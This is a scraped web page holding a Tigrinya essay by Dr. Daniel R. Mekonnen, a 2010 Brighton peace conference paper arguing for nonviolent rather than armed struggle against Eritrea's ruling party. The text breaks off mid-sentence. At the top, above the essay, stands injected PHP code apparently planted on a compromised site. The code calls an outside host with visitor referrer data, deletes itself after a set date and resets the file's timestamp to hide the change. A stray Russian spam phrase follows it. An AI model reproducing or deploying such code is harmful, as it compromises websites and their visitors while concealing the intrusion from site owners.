check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ዘይጎነጻዊ ኣገባብ ቃልስን መኸተ ኣንጻር ኤርትራዊ ምልክን
кремлевская диета

ዘይጎነጻዊ ኣገባብ ቃልስን መኸተ ኣንጻር ኤርትራዊ ምልክን

User Rating: / 109
PoorBest 

  ዘይጎጻዊ ኣገባብ ቃልሲ ክበሃል እንከሎ ብዙሓት ሰባት ምስ ሰላማዊ ሰልፍታን ምጽሓፍ ናይ ጥርዓን ደብዳበታትን ጥራይ ኣተሓሒዞም ዝርድእዎ ሰባት ኣለዉ። ሓደ-ሓደ ግዜ ውን ከም መምዘኒ ናይቲ ኣብ ምልኪ ስርዓት ህግደፍ ዘለካ ኣረኣእያ ጌሮም ይወስድዎ።

 

 

 

 

 

 

 

 

 

ዘይጎነጻዊ ኣገባብ ቃልስን መኸተ ኣንጻር ኤርትራዊ ምልክን

 

(ኣብ ዋዕላ ሰላም ብራይተን፡ ዓዲ እንግሊዝ፡ ዝቐረበ መዛተዪ ወረቐት)

21–23 ጕንበት 2010

 

ብዶ/ር ዳንኤል ረ. መኰነን

 

ዝኸበርኩም ተሳተፍትን ወደብትን ናይዚ ጉባኤ፡

 

ብቐዳምነት፡ ኣብዚ ጉባኤ’ዚ ክሳተፍን ተሞክሮይ ከካፍልን ዕድመ ንዘቕረቡለይ ወደብቲ ከመስግን እፈቱ። እዚ ጽሑፍ’ዚ፡ ኣብ ነሓሰ 2009 ኣብ ፍራንክፈርት ንዝተኻየደ ሓባራዊ ፈስቲቫል ሰልፊ ህዝቢ ኤርትራን ሰልፊ ዲሞክራሲ ኤርትራን ተባሂሉ ዝተዳለወ ጽሑፍ ኢዩ። ኣብቲ ፈስቲቫል ብተክኒካዊ ጸገማት ክካፈል ስለ ዘይከኣልኩ፡ እዚ ጽሑፍ ኣብ ክንዳይ ብኣቶ ኣሰፋው በርሀ ኢዩ ተነቢቡ። ካብ ዕዱማት ክቐርብ ዝኽእል ሕቶታት ክምልስ፡ ርእይቶታት ድማ ክቕበል ዕድል ስለ ዘይረኸብኩ፡ እንገደና ኣብዚ ናይ ሎሚ ጉባኤ ከቕርቦ መሪጸ። ኣገዳስነቱ ምስ ዕማላታት ናይዚ ጉባኤ ‘ውን የሳኒ ኢዩ ዝብል እምነት ስለ ዘለኒ፡ ተሳተፍቲ ጉባኤ ዝሰማምዕሉ ነጥቢ ክኸውን ተሰፋ እገብር።

 

ንሎሚ መሪጸዮ ዘለኹ መዛተዪ ነጥቢ፡ ከምቲ ኣብ ኣርስእስቲ ተነጺሩ ዘሎ፡ ኣብ ዘይጎነጻዊ ኣገባብ ቃልሲ ዘተኮረ ክኸውን ኢዩ። ኩልና ከም እንግንዘቦ እዚ ኣርእስቲ’ዚ ሓደ ካብቶም ኣብዚ እዋንዚ ኣካታዕቲ ኮይኖም ዘለዉ ዛዕባታት ኢዩ። ኣዝዩ ገፊሕ ኣርእስቲ ብምዃኑ ንኹሉ ጎድንታቱ ኣብዚ ናይ ሎሚ መድረኽ ጥራይ ከተነጽሮ ዝከኣል ኣይኮነን። ኣብቲ ኣገዳሲ ዝብሎ ነጥብታት ብምትኳር ተረድኦይ ኣብዚ ጉዳይዚ ከምዚ ዝስዕብ ከቕርቦ ኢየ።

 

1. መእተዊ

 

ከም ህዝቢ ኤርትራ ዝኣመሰለ፡ ንነዊሕ ዓመታት መሰሉ ዝተሓርመ፣ ፍትሒ ዝተነፍጎ፣ ዓመጽ ዘሰልከዮ ህዝቢ፡ ብመሰል ደረጃ ክእድም ወይ ብረት ተሓንጊጡ መሰለይ ክብል መሰል ከም ዘለዎ ብዙሕ ዘከራኽር ነገር ኣይኮነን። ኣብ ካልእ ከይከድና ንኣድማሳዊ ውዕል ሰብኣዊ መሰላት (Universal Declaration of Human Rights) እንተተመልከትና’ኳ እዚ ዝስዕብ ሓሳብ ንረክብ። እቲ ኣዋጅ፡ ኣብ ሳልሳይ ሕጡበ-ጽሑፍ ናይ መእተዊኡ (preamble) ከምዚ ዝስዕብ ዝብል መትከል ኣስሪፉ ኣሎ።

 

Whereas it is essential, if man is not to be compelled to have recourse, as a last resort, to rebellion against tyranny and oppression, that human rights should be protected by the rule of law ...

 

ተዛማዲ ናይ ትግርኛ ትርጉሙ ከምዚ ዝስዕብ ይመስል፦

 

ወዲ ሰብ፡ ዋላ ውን ከም ናይ መጨረሻ ኣማራጺ፡ ተገዲዱ ንጭቆናን ምልክን ብኣድማ መታን ከይምክቶሲ፡  ኣብ ልዕልና ሕጊ ዝተመስረተ ሰብኣዊ መሰላት ክኽበር ኣለዎ።

 

እዚ ሓሳብ እዚ ዋላ’ኳ ብቐጥታ መሰል ምእዳም እንተዘይፈቐደ፡ ብተዘዋዋሪ መገዲ ግን ከም ናይ መጨረሻ ኣማራጺ ክትግበር ከም ዝኽእል ዝእምት መትከል ኣስፊሩ ኣሎ። መሰል ምእዳም ክበሃል እንከሎ ከኣ ብረት ኣልዒልካ ንመሰልካ ምርግራግ ውን ከጠቓልል ከም ዝኽእል እምንቶይ ኢዩ።  ነዚ ትንተና እዚ ዝድግፉ ምሁራትን ክኢላታትን ከም ዘለዉ ውን እፈልጥ። ስለዚ ብመሰል ደረጃ፡ ዝተዓመጸ ህዝቢ፡ ካልእ ኩሉ ኣማራጽታት ዝተነፍጎ ህዝቢ፡ ፖለቲካዊ ኩነታት ዘፍቅደሉ እንተኾይኑ ዕጥቃዊ ቃልሲ ከካይድ ከም ዝኽእል ዘከራኽር ነገር ኣይኮነን። ኣብ ናይ ሕጂ ኩነታት ግን እዚ መሰል’ዚ፡ ከምቲ ጸኒሐ ዝገልጾ፡ ብዙሕ ሕቶታት ዝኸበቦ፡ ኣይ መርገም ኣይ ምረቓ ዝዓይነቱ ጉዳይ ኢዩ። ናብ ታሪኽ ምልስ ኢልና ግን ህዝቢ ኤርትራ ናጽነቱ ንምጭባጥ ዘካየዶ ብረታዊ ቃልሲ ከም ሓደ ጭቡጥ ኣብነት ክጥቀስ ዝኽእል ነገር ምዃኑ ንግንዘብ። እዚ ተሞክሮ እዚ ግን ኣብ ነብሱ ዝኸኣለ ፍሉይ ታሪኻዊ ኩነታት ዝተኻየደ ቃልሲ ብምንባሩ ካብዚ ሕጂ ዘዛርብ ዘሎ ዛዕባ ዝፍለየሉ ብዙሕ ነጥብታት ኣሎ። ሕጂ ዘዛርብ ዘሎ ጉዳይ ግን ኣብዚ ዝካየድ ዘሎ ቃልሲ ኣንጻር ምልኪ ከመይ እንተተገብረ ይሓይሽ ዝብል ክትዕ ኢዩ። እዚ ዝስዕብ ትዕዝብታት ክቐርበሉ ይኽእል።

 

2. ኣብ ኤርትራስ እንታይ ክግበር ይከኣል፧

 

ኣብ ኤርትራ ዘሎ ስርዓት፡ በቲ ንቡር መግለጺ መንግስትነት “መንግስቲ” ክትብሎ ዘሸግር፡ ብኣንጻሩ ብመለኽትን ዓመጽትን ዝቖመ ፖለቲካዊ ጉጅለ ኢዩ። ብፍላይ ካብ መስከረም 2001 ጀሚሩ እዚ ሓቂ እዚ ኣዝዩ ጎሊሑ ኢዩ። ስርዓት ህግደፍ ዝኾነ ይኹን ንዲሞክራስያዊ ለውጢ ዝሓለነ ተበግሶ ከም ዘየፍቅድ፡ እኳ ደኣ ብኣንጻሩ ለውጢ ዝሓትት ተበግሶ ብጭካነ ከምዝምክቶ ብግብሪ ተራእዩ ኢዩ። ሕልፍ ዝበለ መጻይን ኣራዊታውን ባህርይ ዘለዎ ስርዓት ከም ዝኾነ ንኹሉ ደላይ ለውጢ ዝስወሮ ነገር ኣይኮነን። ኣብ ናይ ቃልሲ ስትራተጂ ዘሎ ፍልልያት ግን ኣብ ልዕሊ ባህርያት ስርዓት ህግደፍ ንዘሎ ተረድኦ ዝውክል ከም ዘይኮነ ብሩህ ክኸውን ይግብኦ።

 

ሎሚ ኣብ ውሽጢ ኤርትራ ዝኾነ ይኹን ንዲሞክራስያዊ ለውጢ ዝሓለነ ናይ ቃልሲ ስትራተጂ (ጎነጻዊ ድዩ ዘይጎጻዊ ብዘይገድስ) ከተተግብር ዝከኣል ነገር ኣይኮነን። ኣብ ውሽጢ ኤርትራ ዘሎ ህዝቢ ብኽሳዱ ተረጊጹ ምዕይ ክብለሉ ኣብ ዘይክእል ኩነታት ስለ ዝርከብ፡ እቲ ዝርካቡ ናይ ቃልሲ ተበግሶታት ኣብ ጎረባብቲ ሃገራት ወይ ኣብ ካልኦት ናይ ስደት ሃገራት ኮንካ ኢዩ ዝግበር ዘሎ። ገለ-ገለ ውድባት ኣብ ኢትዮጵያን ሱዳንን ኣብያተ ጽሕፈትን “ንጡፍ” ወተሃደራዊ ህላወን ከም ዘለወን ይግለጽ’ኳ እንተኾነ፡ እቲ ዝበዝሐ ኤርትራዊ ተበግሶታት ግን ኣብ ኤሮጳ፣ ኣመሪካን ካልእ ክፋላት ዓለምን ብዝቕመጡ ኤርትራውያን ዝተዓብለለ ምዃኑ ኩልና ንሰማማዓሉ ነጥቢ’ዩ ዝብል እምነት ኣሎኒ። ስለዚ ብሕጽር ዝበለ ኣገላልጻ ናይ ስደት ቃልሲ ኢልካ እትገልጾ መኸተ ኢዩ ዝካየድ ዘሎ። እቲ ክሕተት ዘለዎ ሕቶ እምበኣር፡ ኣብ ከምዚ ዓይነት ቃልሲ ኣየናይ ዓይነት ስትራተጂ ኢዩ ዝያዳ ዘድምዕ ወይ ኣይናይ’ዩ ዝያዳ ግብራዊ ኢልካ ዝሕተት ሕቶ’ዩ ክኸውን ዘለዎ። ኣብ ጎነጻውን ዘይጎነጻውን ኣገባባት ቃልሲ ዘሎ ፍልስፍናውን ሞራላውን ሙጉት ንግዚኡ ንጎኒ ገዲፍና ኣብቲ ግብራዊ (ፕራግማቲካዊ) መዳይ ኣተኵርና ክንምልሶም ዝግብኣና መሰረታውያን ሕቶታት ኣለዉ። ከምዚ ዝስዕብ ከቕርቦም ኢየ።

 

3. ምስ መንን ኣበይን፧

 

መብዛሕትኡ ኣብ ቃልሲ ዘሎ ሰብ ከም ዘስተውዕለሉ፡ እዚ ዝካየድ ዘሎ መኸተ ኣንጻር ምልኪ ዝልለየሉ ሓደ መሰረታዊ ጠባይ ኣሎ። ነቲ ቃልሲ ክሳብ ሕጂ ጸላዊ ክበሃል ዝኽእል ቁጽሪ ህዝቢ (critical mass) ኣይተጸንበሮን። እቲ ምኽንያት ብዙሕ እኳ እንተኾነ እቲ ጸገም ግን መሰረታዊ ኢዩ። ለውጢ ክደናጎ ካብ ዝገበሩ መሰረታውያን ምኽንያታት ሓደ ድማ ክሳብ ሕጂ ከቢድ ጽልዋ ዘለዎ ቁጽሪ ህዝቢ ኣብ መሳርዕ ቃልሲ ክጽንበር ዘይምኽኣሉ ኢዩ። ድሒሩ ዝኽሰት ዘሎ ተስፋ ዝህብ ናይ ምዕዃኽ ተርእዮታት’ኳ እንተሎ ብመንጽር ሰፊሕ ድጋፍ ህዝቢ ግን ገና ብዙሕ ዝተርፍ ነገራት ከም ዘሎ ዘከራኽር ጉዳይ ኣይኮነን። ነዚ መሰረታዊ ሕጽረት’ዚ ምስቲ ቃልሲ ዝጠልቦ ረቛሕታት ኣዛሚድካ ምርኣዩ ከድልየና ኢዩ። ቃልሲ ብመሰረቱ (ብውክልናን ብጽሒትን) ንመላእ ኣካል ሕብረተሰብ ከጽንብር ዝግብኦ መስርሕ እኳ እንተኾነ ካብ ናብኡ ግን መንእሰይ ዘይሳተፎ ምስ ዝኸውን ኣድማዕነቱ ኣጠራጣሪ ኢዩ። ከምቲ ኣቐዲመ ዝበልክዎ ተስፋ ዝህብ ናይ ቀረባ እዋን ምዕባለታት’ኳ እንተሎ ተሳትፎ መንእሰይ ኣብዚ ዝካየድ ዘሎ ቃልሲ ግን ኣብቲ ዝተሓተ ደረጃ ኢዩ ዘሎ። ዝኾነ ዕጥቃዊ ቃልሲ ከካይድ ኢየ ዝብል ፖለቲካዊ ሓይሊ እምበር ኣብ ትሕቲ ከምዚ ዝኣመሰለ ርኡይ ሕጽረት ዘለዎ ኩነታት ነቲ ዝበሃል ዘሎ ስትራተጂ ብኸመይ ከተግብሮ ከም ዝሕልን ክትርድኦ ኣዝዩ የጸግም።

 

መንእሰይ ኤርትራ ኣብ ቃልሲ ዘይመጸንበሪኡ ዝተፈላለየ ምኽንያታት ክህልዎ ይኽእል። ልዕሊ ኹሉ ግን እቲ ኣብዚ ቐረባ ዓመታት ካብ ኤርትራ ዝተሰደደ መንእሰይ ዳርጋ ብምልኡ ብውትህድርና ዝላደየ፡ ብረቱን ዕጥቁን ደርብዩ ናብ ስደት ሃጽ ዝበለ ዜጋ ኢዩ። እቲ ዝዓበየ ጸላኢኡ ህግደፍ ጥራይ ዘይኮነ ደረት ዝሓለፈ ዕስክርናን ወተሃደራዊ ባህልን ኢዩ። ብግብሪ ይረአ ከም ዘሎ ድማ፡ ይትረፍ ንዓ ብረት ኣልዒልካ ንህግደፍ መክቶ ኢልካዮ ክመጸልካስ ኣኼባታት ጸዊዕካ ዝመጽእ ‘ውን እንተተረኺቡ ንጋዶ ኢዩ። መንእሰይ ኣብ ቃልሲ ብንጥፈት ንኽሳተፍ ጻዕሪ ምክያድ ናይ ኩሉ ሓላፍነት እኳ እንተኾነ ንዓ ኣብ ብረታዊ ቃልሲ ተጸመድ ኢልካዮ ሕራይ ኢሉ ዝመጸልካ መንእሰይ ኣሎ ኢለ ክኣምን ግን ብወገነይ ኣዝዩ ይኸብደኒ። ንነብሰይ ኣካል ናይዚ ዝዛረበሉ ዘለኹ ወለዶ ጌረ ኢየ ዝሓስባ። ነዚ ወለዶዚ ብምሉእነት ይውክል ኢየ ክብል እኳ እንተዘይደፈርኩ ትርግታ ልቡ ግን ብዝተወሰነ ዓቐን ከድምጽ ዝኽእል ኮይኑ ይስምዓኒ። ብተረድኦይ ጎነጽን ውትህድርናን መንእሰይ ሎሚ ክሰምዖ ዝደሊ ናይ መወዳእታ ዘረባ ድኣ እምበር ፈላሚ ሙጉት ኣይመስለንን። እሞ ንመን ሒዝካ ኢዩ ደኣ’ሞ ዕጥቃቂ ቃልሲ ክግበር ዝሕሰብ፧ ሕጂ ናብቲ ፍልስፍናውን ሞራላውን ሙጉት ክምለስ።

 

4. ሱር ዝሰደደ ወተሃደራዊ ባህሊ

 

ኣብ ኤርትራ ምልኪ ህግደፍ ጥራይ ኣይኮነን ጸገም ኮይኑ ዘሎ። እቲ ዝዓበየ ጸገም ንነዊሕ ዓመታት ሱር ዝሰደደ ወተሃደራዊ ባህሊ ኢዩ። እዚ ጸገም’ዚ ንኹሉ ጸጋታት ሕብረተሰብ በኪሉ ገዚፍ ሃገራዊ በሰላ ፈጢሩ ኣሎ። ኣብ ኤርትራ ነባርን ዘላቕን ዲሞክራስያዊ ባህሊ ክዕንብብ እንተኾይኑ ድማ ምውጋድ ህግደፍ ጥራይ እኹል ኣይኮነን። ብወገነይ እቲ ዝዓበየ ብድሆ ዝብሎ፡ ነዚ ዝሳዕረረ ወተሃደራዊ ባህሊ ብዲሞክራስያዊ ባህሊ ምትካእ ኢዩ። እዚ ድማ በሲሉ ዝፈንተረ ወተሃደራዊ ሓሳባታት ብምኹምሳዕ ዘይኮነ ክትግበር ዝኽእል፡ ዲሞክራስያዊ ኣተሓሳስባን ባህልን ብምኹስኳስ ጥራይ’ዩ ክዕወት ዝኽእል ዝብል እምነት ኣሎኒ። ጎነጽ ብባህሪኡ ጎነጽ ኢዩ ዝወልድ። ኣዝዩ ውሑድ (ንጣር) ተሞክሮ ሃገራት ዓለም ገዲፍካ ብጎነጽ ናብ ስልጣን ዝመጽአ ፖለቲካዊ ሓይሊ ንኹሉ ነገራት በዚ መንጽር እዚ ኢዩ ዝርእዮ። ካብዚ ዓንኬል’ዚ ወጺኡ ዲሞክራስያዊ ባህሊ ከዐምብብ ዝተራእየ ተሞክሮታት እንተሎ ከምቲ ካብ ብሱል ጥረ ዝበሃል ምስላ ኢዩ። ሎሚ ኣብ ዓለም እንዳገነነ ዝኸይድ ዘሎ ኣድማሳዊ ተረድኦ ውን ምስትብሃል ዘድልዮ ነገር ኢዩ። ዳርጋ ብምሉኡ ብረት ዓጢቑ ኣንጻር መንግስታት ዝቃለስ ፖለቲካዊ ሓይልታት ከም ግብረ-ሽበራዊ ተበግሶታት ኣብ ዝረኣየሉ እዋን፡ ነዚ መስመር’ዚ ምርዓም ዘኸትሎ ፖለቲካዊ ክሳራታት ካብቲ ክጭበጥ ዝሕለን ዓወታት ዝዛየደ ኢዩ። ናይ መጨረሻ ፍታሕ ካባና ካብ ኤርትራውያን ክመጽእ ከም ዝግብኦ ርዱእ ኮይኑ፡ ኣብ ዓለም በይንና ስለ ዘይንነብር ደገፍን ተደናጋጽነትን ዓለም ክንከስብ ከም ንደሊ ርዱእ ኢዩ። ንጎነጽ ከም መሰረታዊ መፍትሒ ግርጭት ዝረዓመ ፖለቲካዊ ሓይሊ ግን ብሓቂ ከምዚ ዝኣመሰለ ደገፍን ተደናጋጽነትን ክረክብ ይኽእልዶ፧ ምስዚ ተዛሚዱ ዝርአ ብዙሕ ሕጋዊ ኣመታት ከም ዘሎ ውን ምርዳእ የድሊ - ብመንጽር ሕጊ ኩናትን (international humanitarian law) ካልእን። ኣብዚ መድረኸዚ ንኹሉ ብዝርዝር ከተቕርቦ ግን ዝከኣል ኣይኮነን።

 

5. ናይ ኣረዳድኣ ጸገም

 

ዘይጎጻዊ ኣገባብ ቃልሲ ክበሃል እንከሎ ብዙሓት ሰባት ምስ ሰላማዊ ሰልፍታን ምጽሓፍ ናይ ጥርዓን ደብዳበታትን ጥራይ ኣተሓሒዞም ዝርድእዎ ሰባት ኣለዉ። ሓደ-ሓደ ግዜ ውን ከም መምዘኒ ናይቲ ኣብ ምልኪ ስርዓት ህግደፍ ዘለካ ኣረኣእያ ጌሮም ይወስድዎ። ብኻልእ ኣዘራርባ ኣብ ጎነጻዊ ኣገባብ ቃልሲ ኢየ ዝኣምን እንተኢልካ ከም መትከላዊ ተቓላሳይ ትርአ። ብኣንጻሩ ኣብ ዘይጎነጻዊ ቃልሲ ትኣምን እንተኾንካ ድማ ከም ተደናጋጺ ስርዓት ህግደፍ ጌርካ ናይ ምርዳእ ዝንቡዕ ኣመለኻኽታ ኣሎ። እዚ ጌጋ ምዃኑ ንኹልና ብሩህ ይመስለኒ። ኣብ ጎነጽን ዘይጎነጽን ዘሎ መትከላዊ ፍልልይ፡ ኣብ ልዕሊ ምልኪ ክህሉ ንዝኽእል መርገጺ ብዝኾነ መገዲ መዐቀኒኡ ኣይኮነን። በዚ ግጉይ ቀመር (formula) ናይ ቃልሲ ጽንዓትን ተወፋይነትን ክትመዝን ምፍታን ስሕታን ኢዩ። ኣብ ትሕዝቶ ናይ ዘይጎነጻዊ ኣገባብ ቃልሲ ኣቲኻ ንምዝራብ ግን፡ ከም ነብሱ ዝኸኣለ ናይ ቃልሲ ስትራተጂ መጠን፡ ብዙሕ ኣማራጽታትን ተኽእሎታትን ከም ዘለዎ ክዝንጋዕ የብሉን። ከምቲ ዝግባእ ሰሪሕናሉዶ ኣይሰራሕናሉን ኢዩ እቲ ሕቶ። ኣብ መጋባኣያታት ዓለምን ኣብ ጸለውቲ ዝበሃላ ሃገራትን ከምቲ ዝድለ ተሰማዕነት ክንረክብ ክኢልናዶ ዝብል ሕቶ ሓደ ካብቲ ክለዓል ዝኽእል ነጥብታት ኢዩ። ነዚ ንምትግባር ጥይትን ቡምባን የድሊ ድዩ፧

 

ቃልስና ናይ ስደት ቃልሲ ካብ ኮነ፡ ሓደ ካብቲ ክንገብሮ ዝግበኣና ዝነበረ ነገራት ኣብ ስደት ዘሎ ህዝቢ ብስሙር ድምጺ ኣንጻር ምልኪ ህግደፍ ደው ከም ዝብል ምግባር ኢዩ። ኣብ ስደት ዘሎ ህዝብና ዳርጋ ፍርቂ ናይ ምሉእ ህዝቢ ኤርትራ በጺሑሉ ኣብ ዘሎ እዋን፡ ነዚ ክንዲዚ ዝኣክል ህዝቢ ወዲብካን ጠርኒፍካን ክጭበጥ ዝኽእል ዓወት ኣቃሊልካ ዝርአ ከም ዘይኮነ ኩልና ንግንዘቦ ነገር ኢዩ። ኣብዚ መዳይ’ዚ ዘይተዓወትና ደኣ እሞ ከመይ ጌርና ኣብ ወተሃደራዊ መዳይ ክንዕወት እምነት ነሕድር፧ ኣየናይዶ ይቐልል፧ ብሕጽር ዝበለ ኣዘራርባ፡ ንዝበዝሐ ኣብ ስደት ዘሎ ህዝብና ደጋፍን ተደናጋጽን ቃልስና ክኸውን ኣብ ዘየእመንናሉ ህሞት፡ ብኸመይ ዝበለ ተኣምር ካብ ኤሮጳን ኣመሪካን ካልእ ክፋላት ዓለምን ተላዒሉ ብረት ክሕንገጥ ንጽበዮ፧ ኮይኑ ተሪፉ እቲ ኣብ መዓስከር ስደተኛታት ሱዳንን ኢትዮጵያን ዘሎ ህዝቢ ብቐሊሉ ኣብ መሳርዕ ቃልሲ ንኽንጽበር ከተእምኖ ዝቐልል ይመስል ይኸውን። ብግብሪ ግን እቲ ኣብኡ ዘሎ ህዝቢ ብፍላይ ድማ መንእሰይ ከም ካልእ ኩሉ ህዝቢ መዋጽኦ ረኺቡ ኣብ ውሑስ ቦታታት ክበጽሕ ሃረርታን ሕልምን ዘለዎ ድኣ እምበር ተጠውዩ ብረት ተሓንጊጡ ክዋጋእ ቅሩብነት ዘለዎ ኢዩ ኢለ ክኣምን ብወገነይ ኣዝዩ ይኸብደኒ።

 

ተሳታፍነት ናይ ኣብ ስደት ዝርከብ ህዝብና ከነዕዝዝ ዘይምኽኣልና ናትና ጸገም ደኣ እምበር ናይቲ ክንሰርሓሉ ዝግበኣና ዘይጎነጻዊ ስትራተጂ ጸገም ኣይኮነን። ክሳብ ሕጂ ጸላዊ ክበሃል ዝኽእል ቁጽሪ ህዝቢ ኣብ ቃልሲ ከም ዝጽንበር ዘይምግባርና ብሓቂ ናይቲ ስትራተጂ ጸገም ኣይኮነን። ከነተኩረሎም ዝግብኣና ካልኦት ፖለቲካውያን ሕቶታት ኣለዉ - ንኣብነት ስሙር ጥርናፈ በርጌሳውያንን ፖለቲካውያን ሓይልታት ዘይምህላዉ። እዚ ግብራዊ ብድሆታት እዚ ብዕምቆት እንተተረዲእናዮ እቲ ሕቶ ክሳብ ክንደይ ዝተሓላለኸ ምዃኑ ንጹር ይመስለኒ። እምበርኣከስ፡ ጎነጻዊ ስትራተጂ ብሓሳብ ጥራይ ኣብ ልዕሊ ተጻባኢኻ ፖለቲካዊ ጸብለልትነት ክፈጥር ዘኽእል ስለ ዝመስል ጥራይ፡ ግብራውነቱ ከይመዘንካ ከም መርገጺ ክትርዕሞ ኣሸጋሪ ኢዩ - ብፍላይ ኣብ ኩነታትና። እንተተራዒሙ ውን ኣብ ናይ ዘረባ ጨለነት ጥራይ ተሓጺሩ ዝተርፍ ኮይኑ ይስምዓኒ። ገለ-ገለ ዜጋታት ዘቕርብዎ ሙጉት ውን ኣሎ። “ጎነጻዊ-ዘይጎነጻዊ” ኢልካ ኣብ ክንዲ ምፍልላይ ብኹሉ ዝጥዕም ኣገባባት ዘይንቃለስ ይብሉ። ከምቲ ኣቐዲመ ዝገልጽክዎ ግን ምስ ህሉው ፖለቲካዊ ኩነታትና ኣዛሚድና እንተርኢናዮ ጎነጻዊ ኣገባብ ቃልሲ ግብራውነቱ ኣዝዩ ዱሩት ምዃኑ ርዱእ ኢዩ። ንስለ ዘረባ ጥራይ እንተተዛረብናዮ ግን ፋይድኡ እንታይ ኢዩ፧

 

ካልእ መሰረታዊ ሕቶ ‘ውን ኣሎ። እቲ ብብረት ክህረም ዝድለ ዘሎኸ መን ኢዩ፧ ተስፋ እገብር ኩሉ ብረት ዝዓጠቐ ሰብ ክውቃዕ ኣለዎ ዝብል እምነት ከም ዘየሎ። ዝኾነ ኮይኑ፡ ኣብ ኤርትራ ይፍጸም ናይ ዘሎ ገበናት ዝለዓለ ሓላፍነት ዝስከሙ እቶም ሃንደስቱን ሰኣልቱን ኢዮም። እቲ ዝተረፈ ሓመድ ሓፋሽ ግዱድ ዓስከር ኢዩ። እቶም ቀንዲ መን ኢዮም እንተኢልና እቶም ኣብ ዝለዓለ ጽፍሒ ሓላፍት ተዀይጦም ዘለዉ ሰብ መዚ ህግደፍ ኢዮም። ካብኦም ውርድ ኢልካ ውን ገለ ማእከሎት ሓለፍትን መኮንናትን ክህልዉ ይኽእሉ። ብግብሪ ግን እቶም ኣዝዮም ዕሉላት ዝበሃሉ ውሑዳት ውልቀ-ሰባት ምዃኖም ዘከራኽር ኣይመስለንን። እዞም ሰባት እዚኣቶም ካብ ረመጽ ሓዊ ኣዝዮም ዝረሓቑን ውሑስ ሂወትን መነባብሮን ዘለዎም ኢዮም። ብወንጭፍ ዑፍ ከተረኻኽበሎም ዝከኣል ኣይኮነን። እቲ ብጭቡጥ ክግበር ዝክኣል ነገር ግን ነቲ ኣብ ወሰናስን ሃገር ዓሪዱ ዘሎ ተራ ወተሃደር (መብዛሕትኡ ዋርሳይ) ብተመልከተይ ምልቃም ኢዩ። ብሕጋውን ሞራላውን ሙጉት እዚ ኣማራጺ’ዚ ቅቡል ኢዩ ዝብል እምነት እንተሎ ከቢድ ናይ ኣረዳድኣ ጸገም ስለ ዘሎ ጥራይ ይመስለኒ። እዝን ከምዝን ዝኣመሰለ ብድሆታት ንነገራት ስኽን ኢልና ስምዒት ከይሓወስና ከንመዝኖም ከም ዝግባኣ ዘዘኻኽረና ነጥቢ ይመስለኒ። ሎሚ እንዘርኦ ዘርኢ ጽባሕ ጻህያይ ጥራይ ኮይኑ ከይበቁል ኩልና ክንሓስበሉ ዝግባእ ሓላፍነት ይመስለኒ።

 

ካልእ ነገር ውን ኣሎ። ብወተሃደራዊ ሓይሊ መጺኻ ህግደፍ ኣቃሊልካ ዝረአ ስርዓት ኣይኮነን። ብዘይ ደገፍ ናይ ወጻኢ ሓይልታት በዚ መዳይዚ ክትምክቶ ቀሊል ኣይኮነን። ወተሃደራዊ ምትእትታው ናይ ወጻኢ ሓይልታት ኣብ ዝገሃደሉ ግዜ ድማ ዝለዓል መሰረታዊ ሕቶታት ኣሎ። ንኣብነት ናይ ልኡላውነት ሕቶ ካብቲ ክመጽእ ዝኽእል ሕቶታት ሓደ ኢዩ። ኣብዚ መዳይዚ ጥንቁቕ ኣካይዳ ክህሉ ከም ዝግባእ ዝዝንግዕ ሰብ ዘሎ ኣይመስለንን። ነቲ ደፊሩ ኣብ ቃልሲ ክጽንበር ዘይከኣለ ህዝቢ ከምዚ ዝኣሰመ ዘደናግር መሲሉ ዝረኣዮ ነጥብታት ክሳብ ዝሃለወ ክትከስቦ ከጸግም ኢዩ። ምኽንያቱ ውዒሉ ሓዲሩ ህዝቢ ዘይኣመነሉ ለውጢ ድልዱል ሰረት ክህልዎ ዘለዎ ተኽእሎ ምህሙን ክኸውን ስለ ዝኽእል።

 

 

6. መደምደምታ

 

እምበኣርከስ ኣብ ሞንጎ ጎነጻውን ዘይጎነጻውን ቃልሲ ክንካታዕ እንከሎና፡ ፖለቲካዊ ኩነታትናን ታሪኽናን ዝፈጠሮ ሕጽረታትን ንሱ ዘፍቅዶ ተኽሎታትን ኣብ ግምት ብምእታው ደኣ እምበር ሞራላውን ሕጋውን ተቐባልነት ናይቲ እንመርጾ ኣገባብ ቃልሲ ብምርኣይ ጥራይ ኣይኮነን። ብመሰል ደረጃ ጎነጻዊ ኣገባብ ቃልሲ ቅቡል ዝኾነሉ ኩነታት ክህሉ ከም ዝኽእል ርዱእ ኢዩ። ነዚ ዘፍቅድ ታሪኻዊ ኩነታት ኣዝዩ ድሩት ኢዩ። ከም ህግደፍ ዝኣመሰለ መጻይ ስርዓት ብኸመይ ክግጠም ኣለዎ ጥራይ ዘይኮነ፡ ኣብዚ እዋንዚ ህዝቢ ኤርትራ ብኸመይ’ዩ ክገጥሞ ዝኽእል ዝብል ሕቶ እንኮላይ ኣገዳሲ ኢዩ። እቲ ኣብ ውሽጢ ኤርትራ ዘሎ ህዝቢ ክገብሮ ዝኽእል ነገራት ከም ዘየለ ርዱእ ኢዩ። ኣብ ስደት ውሑድ ዘይበሃል ቁጽሪ ህዝቢ ከም ዘሎ ንፈልጥ። ክሳብ ሕጂ ዝነበረ ተርኡ ግን ኣዝዩ ዝሕቱል ከም ዝኾነ ፍሉጥ ጉዳይ ኢዩ። እዚ ርኡይ ሕጽረታት’ዚ ጎነጻዊ ኣገባብ ቃልሲ ኣብዚ ሕጂ እዋን ኣብ ኤርትራዊ መኸተ ኣንጻር ምልኪ ኣድማዕን ግብራውን ከም ዘይኮነ ዘነጽር ኣብነታት ኢዩ ዝብል እምነት ኣለኒ። ልዕሊ ኹሉ ግን ከም ህዝቢ ኤርትራ ዝኣመሰለ ካብ ልክዕ ዝሓለፈ ዕስክርናን ወተሃደራዊ ባህልን ዘላደዮ ህዝቢ ተተመላሊሱ ኣብ ጎነጽ ክሽመም ትጽቢት ምሕዳር ንኽውንነት ዘይምግንዛብ ይመስለኒ። ኣብ ኣኼባታትን ሰላማዊ ሰልፍታትን ጉልባቡ ቀሊዑ ዝሳተፍ ጸላዊ ዝበሃል ቀጽሪ ህዝቢ ዘይተጎስጎሰስ ንህግደፍ ብረት 